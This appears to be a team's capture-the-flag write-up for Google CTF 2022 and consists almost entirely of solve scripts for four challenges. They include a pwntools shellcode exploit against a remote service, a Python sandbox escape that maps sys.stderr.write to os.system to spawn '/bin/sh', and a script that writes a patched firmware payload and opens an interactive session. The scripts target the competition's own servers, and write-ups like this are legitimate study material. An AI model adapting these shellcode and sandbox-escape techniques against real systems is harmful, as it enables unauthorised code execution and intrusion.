Team ST4RT, 65th

Appnote.txt

import struct

with open("dump.zip", "rb") as f:
    data = f.read()

u16 = lambda x: struct.unpack("<H", x)[0]

flag = bytearray()
eocd = data[0xEEE2:].split(b"PK\x05\x06")
for d in eocd[1:]:
    offset = u16(d[12:14])
    flag.append(data[offset-1])

print(flag)

Segfault Labyrinth

from pwn import *

context.arch = "amd64"

#p = process("./challenge")
p = remote("segfault-labyrinth.2022.ctfcompetition.com", 1337)
p.recvline()

p.sendline(b"0"*8)

code = """
mov rsp, rdi;
mov rbp, rdi;
add rsp, 0x400;
add rbp, 0x400;

mov r8, rdi;

TASK:
xor rbx, rbx;
RUN:
mov rdi, 2;
mov rsi, [r8 + rbx*8];
mov rdx, 0x1;
mov rax, 1;
syscall;

cmp rax, 0xfffffffffffffff2;
jne FOUND;

inc rbx;
cmp rbx, 0x10;
jne RUN;

FOUND:
mov rax, [rsi];
mov r8, rsi;
cmp al, 0;
je TASK;

mov rdx, 0x40;
mov rdi, 1;
mov rax, 1;
syscall;
"""

payload = b""
payload += asm(code)
p.send(payload.ljust(0x1000, b"\x90"))

print(p.recv())

Treebox

sys.stderr.write = os.system
a = {}
a["/bin/sh"]
--END

Weather

from pwn import *
import struct


u16 = lambda x: struct.unpack(">H", x)[0]

with open("do.ihx", "r") as f:
    lines = f.readlines()

payload = bytearray(0x80)

for line in lines:
    data = bytes.fromhex(line[1:])
    size = data[0]
    offset = u16(data[1:3])
    record = data[3]
    body = data[4:4+size]
    checksum = data[-1]

    payload[offset:offset+size] = body

print(payload.hex())
payload = bytearray([0xFF] * 0xe) + payload[0x62:]

p = remote("weather.2022.ctfcompetition.com", 1337)

p.sendlineafter(b"? ", (f"w 101153 128 {40} {0xA5} {0x5A} {0xA5} {0x5A} " + " ".join(map(lambda x: str(x^0xFF), payload[:0x40]))).encode())
p.sendlineafter(b"? ", f"r 101153 64".encode())
p.recvline()
recv = list(map(int, p.recvuntil(b"-end")[:-4].replace(b"\n", b" ").split()))
print(bytes(recv))
print(recv)

payload2 = [0xFF]*19 + [0x12, 0x0a, 0x0e]

p.sendlineafter(b"? ", (f"w 101153 128 {20} {0xA5} {0x5A} {0xA5} {0x5A} " + " ".join(map(lambda x: str(x^0xFF), payload2))).encode())
p.interactive()

p.sendlineafter(b"? ", f"r 101153 64".encode())
p.recvline()
recv = list(map(int, p.recvuntil(b"-end")[:-4].replace(b"\n", b" ").split()))
print(bytes(recv))
print(recv)

p.interactive()